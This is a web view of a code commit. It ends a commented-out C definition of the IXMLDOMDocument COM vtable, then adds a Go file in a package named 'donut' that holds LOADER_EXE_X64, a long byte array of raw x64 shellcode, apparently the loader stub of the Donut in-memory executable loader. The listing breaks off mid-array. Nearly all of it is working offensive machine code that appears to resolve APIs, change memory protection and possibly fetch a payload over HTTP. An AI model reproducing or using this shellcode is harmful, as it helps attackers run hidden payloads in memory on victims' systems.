542 HRESULT ( STDMETHODCALLTYPE *save )(
543 IXMLDOMDocument * This,
544 VARIANT destination);
545
546 HRESULT ( STDMETHODCALLTYPE *get_validateOnParse )(
547 IXMLDOMDocument * This,
548 VARIANT_BOOL *isValidating);
549
550 HRESULT ( STDMETHODCALLTYPE *put_validateOnParse )(
551 IXMLDOMDocument * This,
552 VARIANT_BOOL isValidating);
553
554 HRESULT ( STDMETHODCALLTYPE *get_resolveExternals )(
555 IXMLDOMDocument * This,
556 VARIANT_BOOL *isResolving);
557
558 HRESULT ( STDMETHODCALLTYPE *put_resolveExternals )(
559 IXMLDOMDocument * This,
560 VARIANT_BOOL isResolving);
561
562 HRESULT ( STDMETHODCALLTYPE *get_preserveWhiteSpace )(
563 IXMLDOMDocument * This,
564 VARIANT_BOOL *isPreserving);
565
566 HRESULT ( STDMETHODCALLTYPE *put_preserveWhiteSpace )(
567 IXMLDOMDocument * This,
568 VARIANT_BOOL isPreserving);
569
570 HRESULT ( STDMETHODCALLTYPE *put_onreadystatechange )(
571 IXMLDOMDocument * This,
572 VARIANT readystatechangeSink);
573
574 HRESULT ( STDMETHODCALLTYPE *put_ondataavailable )(
575 IXMLDOMDocument * This,
576 VARIANT ondataavailableSink);
577
578 HRESULT ( STDMETHODCALLTYPE *put_ontransformnode )(
579 IXMLDOMDocument * This,
580 VARIANT ontransformnodeSink);
581
582 END_INTERFACE
583 } IXMLDOMDocumentVtbl;
584
585 typedef struct _IXMLDOMDocument {
586 IXMLDOMDocumentVtbl *lpVtbl;
587 } XMLDomDocument;*/
+895
-0
loader_exe_x64.go less more
0 package donut
1
2 // LOADER_EXE_X64 - stub for EXE PE files
3 var LOADER_EXE_X64 = []byte{
4
5 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89,
6 0x74, 0x24, 0x18, 0x57, 0x48, 0x81, 0xec, 0x00, 0x05, 0x00, 0x00, 0x33,
7 0xff, 0x48, 0x8b, 0xd9, 0x48, 0x39, 0xb9, 0x38, 0x02, 0x00, 0x00, 0x0f,
8 0x84, 0xc0, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x41, 0x28, 0x48, 0x8b, 0x91,
9 0x88, 0x00, 0x00, 0x00, 0xe8, 0xbb, 0x23, 0x00, 0x00, 0x48, 0x85, 0xc0,
10 0x0f, 0x84, 0xa1, 0x00, 0x00, 0x00, 0x48, 0x21, 0x7c, 0x24, 0x28, 0x4c,
11 0x8d, 0x05, 0x26, 0x11, 0x00, 0x00, 0x21, 0x7c, 0x24, 0x20, 0x4c, 0x8b,
12 0xcb, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0xd0, 0x4c, 0x8b, 0x43, 0x28, 0x48,
13 0x8b, 0xcb, 0x48, 0x8b, 0x93, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xf8,
14 0xe8, 0x83, 0x23, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b, 0xcb,
15 0x48, 0x8b, 0x93, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xe8, 0xe8, 0x6d,
16 0x23, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b, 0xcb, 0x48, 0x8b,
17 0x93, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0xe8, 0x57, 0x23, 0x00,
18 0x00, 0x48, 0x85, 0xed, 0x74, 0x4c, 0x48, 0x85, 0xf6, 0x74, 0x47, 0x48,
19 0x85, 0xc0, 0x74, 0x42, 0xc7, 0x44, 0x24, 0x60, 0x0b, 0x00, 0x10, 0x00,
20 0xff, 0xd0, 0x48, 0x8b, 0xc8, 0x48, 0x8d, 0x54, 0x24, 0x30, 0xff, 0xd6,
21 0x48, 0x8b, 0x83, 0x38, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x4c, 0x24, 0x30,
22 0x48, 0x83, 0xa4, 0x24, 0xc8, 0x00, 0x00, 0x00, 0xf0, 0x33, 0xd2, 0x48,
23 0x89, 0x84, 0x24, 0x28, 0x01, 0x00, 0x00, 0xff, 0xd5, 0xeb, 0x0b, 0x48,
24 0x83, 0xc8, 0xff, 0xeb, 0x08, 0xe8, 0x86, 0x10, 0x00, 0x00, 0x48, 0x8b,
25 0xc7, 0x4c, 0x8d, 0x9c, 0x24, 0x00, 0x05, 0x00, 0x00, 0x49, 0x8b, 0x5b,
26 0x10, 0x49, 0x8b, 0x6b, 0x18, 0x49, 0x8b, 0x73, 0x20, 0x49, 0x8b, 0xe3,
27 0x5f, 0xc3, 0xcc, 0xcc, 0xf0, 0xff, 0x41, 0x08, 0x8b, 0x41, 0x08, 0xc3,
28 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc3, 0xcc, 0xcc, 0x4d, 0x85, 0xc0, 0x75,
29 0x06, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xc3, 0x4c, 0x8b, 0x49, 0x10, 0x49,
30 0x8b, 0x81, 0xf4, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x0d, 0x49,
31 0x8b, 0x81, 0xfc, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x74, 0x19,
32 0x49, 0x8b, 0x81, 0xb4, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x17,
33 0x49, 0x8b, 0x81, 0xbc, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x75,
34 0x0a, 0x49, 0x89, 0x08, 0xf0, 0xff, 0x41, 0x08, 0x33, 0xc0, 0xc3, 0x49,
35 0x83, 0x20, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc3, 0xcc, 0xcc, 0xcc,
36 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x08, 0xff, 0xc8, 0xc3, 0xcc,
37 0x33, 0xc0, 0xc3, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c,
38 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57, 0x48, 0x83, 0xec, 0x20,
39 0x49, 0x8b, 0xf9, 0x41, 0x8b, 0xe8, 0x48, 0x8b, 0xf1, 0x41, 0xf6, 0xc0,
40 0x02, 0x74, 0x1b, 0x48, 0x8b, 0x5c, 0x24, 0x50, 0x48, 0x85, 0xdb, 0x74,
41 0x1c, 0x48, 0x8b, 0x49, 0x38, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x08, 0x48,
42 0x8b, 0x46, 0x38, 0x48, 0x89, 0x03, 0x40, 0xf6, 0xc5, 0x01, 0x74, 0x1c,
43 0x48, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x12,
44 0x48, 0x8d, 0x5e, 0x28, 0x48, 0x8b, 0x03, 0x48, 0x8b, 0xcb, 0xff, 0x50,
45 0x08, 0x48, 0x89, 0x1f, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x48,
46 0x8b, 0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74, 0x24, 0x40, 0x48, 0x83, 0xc4,
47 0x20, 0x5f, 0xc3, 0xcc, 0x40, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
48 0x41, 0x58, 0x48, 0x8b, 0xda, 0xff, 0x50, 0x78, 0x89, 0x03, 0x33, 0xc0,
49 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x53,
50 0x48, 0x83, 0xec, 0x60, 0x83, 0x60, 0x20, 0x00, 0x48, 0x8d, 0x48, 0xb8,
51 0x83, 0x60, 0x18, 0x00, 0x48, 0x8b, 0xda, 0x83, 0x60, 0x10, 0x00, 0x33,
52 0xd2, 0x44, 0x8d, 0x42, 0x40, 0xe8, 0x2a, 0x27, 0x00, 0x00, 0x48, 0x8b,
53 0x03, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x50, 0x18,
54 0x85, 0xc0, 0x75, 0x1e, 0x48, 0x8b, 0x03, 0x4c, 0x8d, 0x4c, 0x24, 0x78,
55 0x4c, 0x8d, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0x48,
56 0x8d, 0x94, 0x24, 0x88, 0x00, 0x00, 0x00, 0xff, 0x50, 0x20, 0x33, 0xc0,
57 0x48, 0x83, 0xc4, 0x60, 0x5b, 0xc3, 0xcc, 0xcc, 0x4d, 0x8b, 0xc8, 0x4d,
58 0x85, 0xc0, 0x75, 0x06, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xc3, 0x4c, 0x8b,
59 0x41, 0x58, 0x49, 0x8b, 0x80, 0xf4, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x02,
60 0x75, 0x0d, 0x49, 0x8b, 0x80, 0xfc, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x42,
61 0x08, 0x74, 0x19, 0x49, 0x8b, 0x80, 0xa4, 0x06, 0x00, 0x00, 0x48, 0x3b,
62 0x02, 0x75, 0x16, 0x49, 0x8b, 0x80, 0xac, 0x06, 0x00, 0x00, 0x48, 0x3b,
63 0x42, 0x08, 0x75, 0x09, 0x49, 0x89, 0x09, 0xf0, 0xff, 0x41, 0x08, 0xeb,
64 0x24, 0x49, 0x8b, 0x80, 0xb4, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75,
65 0x1b, 0x49, 0x8b, 0x80, 0xbc, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08,
66 0x75, 0x0e, 0x48, 0x8d, 0x41, 0x10, 0x49, 0x89, 0x01, 0xf0, 0xff, 0x41,
67 0x18, 0x33, 0xc0, 0xc3, 0x49, 0x83, 0x21, 0x00, 0xb8, 0x02, 0x40, 0x00,
68 0x80, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0x44, 0x24, 0x30, 0x83, 0x20, 0x00,
69 0x33, 0xc0, 0xc3, 0xcc, 0x0f, 0xaf, 0xca, 0x8b, 0xc1, 0xc3, 0xcc, 0xcc,
70 0x48, 0x8b, 0x44, 0x24, 0x28, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc3, 0xcc,
71 0x8d, 0x04, 0x11, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x18, 0x55, 0x56, 0x57,
72 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0xd9, 0x48,
73 0x81, 0xc1, 0x58, 0x03, 0x00, 0x00, 0xff, 0x53, 0x30, 0x48, 0x8b, 0xf0,
74 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xd7,
75 0x00, 0x00, 0x00, 0x48, 0x8d, 0x93, 0xc0, 0x05, 0x00, 0x00, 0x48, 0x8b,
76 0xce, 0xff, 0x53, 0x38, 0x48, 0x8b, 0xe8, 0x48, 0x85, 0xc0, 0x0f, 0x84,
77 0xbc, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3d, 0x99, 0xff, 0xff, 0xff, 0x4c,
78 0x8d, 0x3d, 0x86, 0xff, 0xff, 0xff, 0x41, 0x2b, 0xff, 0x0f, 0x88, 0xa5,
79 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8,
80 0x40, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xf7, 0x48, 0x8b, 0xc8, 0xff, 0x53,
81 0x60, 0x85, 0xc0, 0x0f, 0x84, 0x87, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xc7,
82 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xcd, 0xe8, 0xa1, 0x25, 0x00, 0x00, 0x44,
83 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24, 0x58, 0x41, 0x8b, 0xd6,
84 0x48, 0x8b, 0xcd, 0xff, 0x53, 0x60, 0x48, 0x8d, 0x93, 0xd0, 0x05, 0x00,
85 0x00, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x38, 0x48, 0x8b, 0xf0, 0x48, 0x85,
86 0xc0, 0x74, 0x51, 0x48, 0x8d, 0x3d, 0x42, 0xff, 0xff, 0xff, 0x4c, 0x8d,
87 0x35, 0x2f, 0xff, 0xff, 0xff, 0x41, 0x2b, 0xfe, 0x78, 0x3e, 0x4c, 0x8d,
88 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x8b,
89 0xef, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x74, 0x25, 0x44,
90 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce, 0xe8, 0x3f, 0x25, 0x00,
91 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24, 0x58, 0x8b,
92 0xd5, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x60, 0xe9, 0x21, 0xff, 0xff, 0xff,
93 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x83, 0xc4, 0x20, 0x41,
94 0x5f, 0x41, 0x5e, 0x5f, 0x5e, 0x5d, 0xc3, 0xcc, 0x48, 0x89, 0x5c, 0x24,
95 0x18, 0x55, 0x56, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x20,
96 0x48, 0x8b, 0xd9, 0x48, 0x81, 0xc1, 0x64, 0x03, 0x00, 0x00, 0xff, 0x53,
97 0x30, 0x48, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x01, 0x00,
98 0x00, 0x00, 0xe9, 0xd7, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x93, 0x70, 0x05,
99 0x00, 0x00, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x38, 0x48, 0x8b, 0xe8, 0x48,
100 0x85, 0xc0, 0x0f, 0x84, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3d, 0x65,
101 0x1f, 0x00, 0x00, 0x4c, 0x8d, 0x3d, 0xf6, 0xfc, 0xff, 0xff, 0x41, 0x2b,
102 0xff, 0x0f, 0x88, 0xa5, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x50,
103 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xf7, 0x48,
104 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x0f, 0x84, 0x87, 0x00, 0x00,
105 0x00, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xcd, 0xe8, 0x89,
106 0x24, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24,
107 0x58, 0x41, 0x8b, 0xd6, 0x48, 0x8b, 0xcd, 0xff, 0x53, 0x60, 0x48, 0x8d,
108 0x93, 0x90, 0x05, 0x00, 0x00, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x38, 0x48,
109 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x74, 0x51, 0x48, 0x8d, 0x3d, 0xf2, 0x1e,
110 0x00, 0x00, 0x4c, 0x8d, 0x35, 0xdf, 0x1e, 0x00, 0x00, 0x41, 0x2b, 0xfe,
111 0x78, 0x3e, 0x4c, 0x8d, 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40,
112 0x00, 0x00, 0x00, 0x8b, 0xef, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85,
113 0xc0, 0x74, 0x25, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce,
114 0xe8, 0x27, 0x24, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d,
115 0x4c, 0x24, 0x58, 0x8b, 0xd5, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x60, 0xe9,
116 0x21, 0xff, 0xff, 0xff, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48,
117 0x83, 0xc4, 0x20, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0x5e, 0x5d, 0xc3, 0xcc,
118 0x40, 0x55, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41,
119 0x57, 0x48, 0x8d, 0xac, 0x24, 0x48, 0xfe, 0xff, 0xff, 0x48, 0x81, 0xec,
120 0xb8, 0x02, 0x00, 0x00, 0x83, 0xa5, 0x08, 0x02, 0x00, 0x00, 0x00, 0x48,
121 0x8b, 0xf9, 0x45, 0x33, 0xf6, 0x48, 0x8d, 0x4c, 0x24, 0x40, 0x33, 0xd2,
122 0xbe, 0x00, 0x02, 0x60, 0x84, 0x41, 0x8d, 0x5e, 0x68, 0x44, 0x8b, 0xc3,
123 0xe8, 0xdb, 0x23, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xb0, 0x89, 0x5c, 0x24,
124 0x40, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x8f, 0xe8, 0x06, 0x00,
125 0x00, 0x48, 0x8d, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x33, 0xd2, 0x48, 0x89,
126 0x45, 0x88, 0x4c, 0x8d, 0x4c, 0x24, 0x40, 0xb8, 0x00, 0x01, 0x00, 0x00,
127 0x41, 0xb8, 0x00, 0x00, 0x00, 0x10, 0x89, 0x44, 0x24, 0x60, 0x89, 0x45,
128 0x90, 0xff, 0x97, 0xf0, 0x00, 0x00, 0x00, 0x33, 0xdb, 0x85, 0xc0, 0x0f,
129 0x84, 0x16, 0x02, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x54, 0x04, 0xb8, 0x00,
130 0x32, 0xe0, 0x84, 0x44, 0x8b, 0xe3, 0x89, 0x5c, 0x24, 0x20, 0x41, 0x0f,
131 0x94, 0xc4, 0x0f, 0x44, 0xf0, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x33,
132 0xd2, 0x33, 0xc9, 0xff, 0x97, 0xf8, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xe8,
133 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xe2, 0x01, 0x00, 0x00, 0x44, 0x0f, 0xb7,
134 0x44, 0x24, 0x64, 0x48, 0x8d, 0x55, 0xb0, 0x48, 0x89, 0x5c, 0x24, 0x38,
135 0x45, 0x33, 0xc9, 0x89, 0x5c, 0x24, 0x30, 0x48, 0x8b, 0xc8, 0xc7, 0x44,
136 0x24, 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0x89, 0x5c, 0x24, 0x20, 0xff,
137 0x97, 0x00, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x0f,
138 0x84, 0x51, 0x01, 0x00, 0x00, 0x48, 0x89, 0x5c, 0x24, 0x38, 0x48, 0x8d,
139 0x97, 0xe8, 0x07, 0x00, 0x00, 0x89, 0x74, 0x24, 0x30, 0x4c, 0x8d, 0x85,
140 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x5c, 0x24, 0x28, 0x45, 0x33, 0xc9,
141 0x48, 0x8b, 0xc8, 0x48, 0x89, 0x5c, 0x24, 0x20, 0xff, 0x97, 0x20, 0x01,
142 0x00, 0x00, 0x48, 0x8b, 0xd8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x0f, 0x01,
143 0x00, 0x00, 0x45, 0x85, 0xe4, 0x74, 0x28, 0x0f, 0xba, 0xe6, 0x0c, 0x73,
144 0x22, 0x45, 0x8d, 0x4e, 0x04, 0xc7, 0x85, 0x10, 0x02, 0x00, 0x00, 0x80,
145 0x33, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
146 0xc8, 0x41, 0x8d, 0x56, 0x1f, 0xff, 0x97, 0x08, 0x01, 0x00, 0x00, 0x45,
147 0x33, 0xe4, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x44, 0x89, 0x64, 0x24,
148 0x20, 0x33, 0xd2, 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x28, 0x01, 0x00, 0x00,
149 0x85, 0xc0, 0x0f, 0x84, 0xb8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x8d, 0x00,
150 0x02, 0x00, 0x00, 0xc7, 0x85, 0x00, 0x02, 0x00, 0x00, 0x04, 0x00, 0x00,
151 0x00, 0x4c, 0x8d, 0x85, 0x08, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x64, 0x24,
152 0x20, 0xba, 0x13, 0x00, 0x00, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x30,
153 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00, 0x00, 0x00, 0x81,
154 0xbd, 0x08, 0x02, 0x00, 0x00, 0xc8, 0x00, 0x00, 0x00, 0x75, 0x79, 0x48,
155 0x8d, 0xb7, 0x18, 0x09, 0x00, 0x00, 0xc7, 0x85, 0x00, 0x02, 0x00, 0x00,
156 0x08, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xc6, 0x4c, 0x89, 0x26, 0x4c, 0x8d,
157 0x8d, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x64, 0x24, 0x20, 0xba, 0x05,
158 0x00, 0x00, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x30, 0x01, 0x00, 0x00,
159 0x85, 0xc0, 0x74, 0x44, 0x48, 0x8b, 0x16, 0x48, 0x85, 0xd2, 0x74, 0x3c,
160 0x33, 0xc9, 0x45, 0x8d, 0x4c, 0x24, 0x04, 0x41, 0xb8, 0x00, 0x30, 0x00,
161 0x00, 0xff, 0x57, 0x48, 0x48, 0x89, 0x87, 0x20, 0x09, 0x00, 0x00, 0x48,
162 0x85, 0xc0, 0x74, 0x20, 0x44, 0x8b, 0x06, 0x4c, 0x8d, 0x8d, 0x18, 0x02,
163 0x00, 0x00, 0x48, 0x8b, 0xd0, 0x44, 0x89, 0xa5, 0x18, 0x02, 0x00, 0x00,
164 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x10, 0x01, 0x00, 0x00, 0x44, 0x8b, 0xf0,
165 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x18, 0x01, 0x00, 0x00, 0x49, 0x8b, 0xcf,
166 0xff, 0x97, 0x18, 0x01, 0x00, 0x00, 0x49, 0x8b, 0xcd, 0xff, 0x97, 0x18,
167 0x01, 0x00, 0x00, 0x45, 0x85, 0xf6, 0x74, 0x46, 0x83, 0xbf, 0x34, 0x02,
168 0x00, 0x00, 0x03, 0x75, 0x3d, 0x48, 0x8b, 0x9f, 0x20, 0x09, 0x00, 0x00,
169 0x48, 0x8d, 0x97, 0x08, 0x09, 0x00, 0x00, 0x44, 0x8b, 0x8f, 0x18, 0x09,
170 0x00, 0x00, 0x48, 0x8d, 0x8f, 0xf8, 0x08, 0x00, 0x00, 0x4c, 0x8b, 0xc3,
171 0xe8, 0xe3, 0x1d, 0x00, 0x00, 0x48, 0x8b, 0x57, 0x28, 0x48, 0x8d, 0x8f,
172 0xf0, 0x07, 0x00, 0x00, 0xe8, 0x8b, 0x1c, 0x00, 0x00, 0x48, 0x3b, 0x83,
173 0x18, 0x05, 0x00, 0x00, 0x75, 0x05, 0x41, 0x8b, 0xc6, 0xeb, 0x02, 0x33,
174 0xc0, 0x48, 0x81, 0xc4, 0xb8, 0x02, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e,
175 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc,
176 0x48, 0x89, 0x5c, 0x24, 0x08, 0x4c, 0x89, 0x44, 0x24, 0x18, 0x55, 0x56,
177 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8d, 0xac,
178 0x24, 0xf0, 0xfe, 0xff, 0xff, 0x48, 0x81, 0xec, 0x10, 0x02, 0x00, 0x00,
179 0x4c, 0x63, 0x7a, 0x3c, 0x4d, 0x8b, 0xe9, 0x48, 0x8b, 0xda, 0x4c, 0x8b,
180 0xe1, 0x41, 0x8b, 0x84, 0x17, 0x88, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f,
181 0x84, 0x95, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3c, 0x02, 0x8b, 0x77, 0x18,
182 0x85, 0xf6, 0x0f, 0x84, 0x86, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x1c, 0x33,
183 0xc9, 0x44, 0x8b, 0x47, 0x0c, 0x48, 0x03, 0xc2, 0x48, 0x89, 0x44, 0x24,
184 0x30, 0x4c, 0x03, 0xc2, 0x8b, 0x47, 0x20, 0x48, 0x03, 0xc2, 0x48, 0x89,
185 0x85, 0x58, 0x01, 0x00, 0x00, 0x8b, 0x47, 0x24, 0x48, 0x03, 0xc2, 0x48,
186 0x89, 0x44, 0x24, 0x28, 0x41, 0x8a, 0x00, 0x84, 0xc0, 0x74, 0x14, 0x33,
187 0xd2, 0xff, 0xc1, 0x0c, 0x20, 0x88, 0x44, 0x15, 0x00, 0x8b, 0xd1, 0x42,
188 0x8a, 0x04, 0x01, 0x84, 0xc0, 0x75, 0xee, 0xc6, 0x44, 0x0d, 0x00, 0x00,
189 0x49, 0x8b, 0xd5, 0x48, 0x8d, 0x4d, 0x00, 0xe8, 0xbc, 0x1b, 0x00, 0x00,
190 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0x8b, 0x85, 0x58, 0x01, 0x00, 0x00,
191 0xff, 0xce, 0x49, 0x8b, 0xd5, 0x8b, 0x0c, 0xb0, 0x48, 0x03, 0xcb, 0xe8,
192 0xa0, 0x1b, 0x00, 0x00, 0x48, 0x33, 0x44, 0x24, 0x20, 0x48, 0x3b, 0x85,
193 0x60, 0x01, 0x00, 0x00, 0x74, 0x21, 0x85, 0xf6, 0x75, 0xd7, 0x33, 0xc0,
194 0x48, 0x8b, 0x9c, 0x24, 0x50, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x10,
195 0x02, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f,
196 0x5e, 0x5d, 0xc3, 0x48, 0x8b, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x4c, 0x24,
197 0x30, 0x0f, 0xb7, 0x04, 0x70, 0x44, 0x8b, 0x04, 0x81, 0x4c, 0x03, 0xc3,
198 0x4c, 0x3b, 0xc7, 0x0f, 0x82, 0xaf, 0x00, 0x00, 0x00, 0x41, 0x8b, 0x84,
199 0x1f, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x03, 0xc7, 0x4c, 0x3b, 0xc0, 0x0f,
200 0x83, 0x9b, 0x00, 0x00, 0x00, 0x33, 0xdb, 0x44, 0x8b, 0xcb, 0x41, 0x38,
201 0x18, 0x74, 0x21, 0x41, 0x83, 0xf9, 0x3c, 0x73, 0x1b, 0x41, 0x8b, 0xc9,
202 0x42, 0x8a, 0x04, 0x01, 0x88, 0x44, 0x0c, 0x40, 0x42, 0x80, 0x3c, 0x01,
203 0x2e, 0x74, 0x09, 0x41, 0xff, 0xc1, 0x43, 0x38, 0x1c, 0x01, 0x75, 0xdf,
204 0x41, 0x8d, 0x41, 0x01, 0x8b, 0xd0, 0xc6, 0x44, 0x04, 0x40, 0x64, 0x41,
205 0x8d, 0x41, 0x02, 0xc6, 0x44, 0x04, 0x40, 0x6c, 0x41, 0x8d, 0x41, 0x03,
206 0xc6, 0x44, 0x04, 0x40, 0x6c, 0x41, 0x8d, 0x41, 0x04, 0x4e, 0x8d, 0x0c,
207 0x02, 0x88, 0x5c, 0x04, 0x40, 0x8b, 0xd3, 0x41, 0x38, 0x19, 0x74, 0x17,
208 0x83, 0xfa, 0x7f, 0x73, 0x12, 0x8b, 0xca, 0xff, 0xc2, 0x42, 0x8a, 0x04,
209 0x09, 0x88, 0x44, 0x0d, 0x80, 0x42, 0x38, 0x1c, 0x0a, 0x75, 0xe9, 0x8b,
210 0xc2, 0x48, 0x8d, 0x4c, 0x24, 0x40, 0x88, 0x5c, 0x05, 0x80, 0x41, 0xff,
211 0x54, 0x24, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x11, 0x48, 0x8d, 0x55, 0x80,
212 0x48, 0x8b, 0xc8, 0x41, 0xff, 0x54, 0x24, 0x38, 0x4c, 0x8b, 0xc0, 0xeb,
213 0x03, 0x4c, 0x8b, 0xc3, 0x49, 0x8b, 0xc0, 0xe9, 0x10, 0xff, 0xff, 0xff,
214 0x40, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0x4a, 0x30, 0x48, 0x8b,
215 0xda, 0x48, 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10,
216 0x48, 0x83, 0x63, 0x30, 0x00, 0x48, 0x8b, 0x4b, 0x38, 0x48, 0x85, 0xc9,
217 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x63, 0x38,
218 0x00, 0x48, 0x8b, 0x4b, 0x28, 0x48, 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b,
